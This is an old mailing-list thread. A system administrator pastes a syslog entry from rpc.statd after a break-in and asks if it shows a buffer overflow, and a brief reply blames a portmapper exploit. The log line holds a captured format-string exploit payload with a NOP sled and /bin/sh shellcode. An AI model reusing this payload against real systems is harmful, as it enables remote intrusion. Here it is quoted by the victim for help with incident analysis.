It looks like someone tried to exploit your portmapper. If you want to be sure that nobody gets into your network, turn it off.
--On Samstag, 15. September 2001 12:51 -0400 Russell Speed <[EMAIL PROTECTED]> wrote:
I am curious if the following is an example of a buffer overflow. I noticed this in my syslog - and the following day had someone logged in from an IP I'm not aware of. I changed the passwords - and added an entry to the input chain to block the IP, but am wondering what other things I should do? Should I remove /bin/sh for something less obvious as a general protection from buffer overflows? As you can see it's a lot of binary and then near the end is "/bin/sh". Sep 9 21:27:43 gw /sbin/rpc.statd[336]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\ 220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\ 220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\ 220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220 Sep 9 21:27:43 gw Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^A Í\200è\177ÿÿÿ Thanks, Russell -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

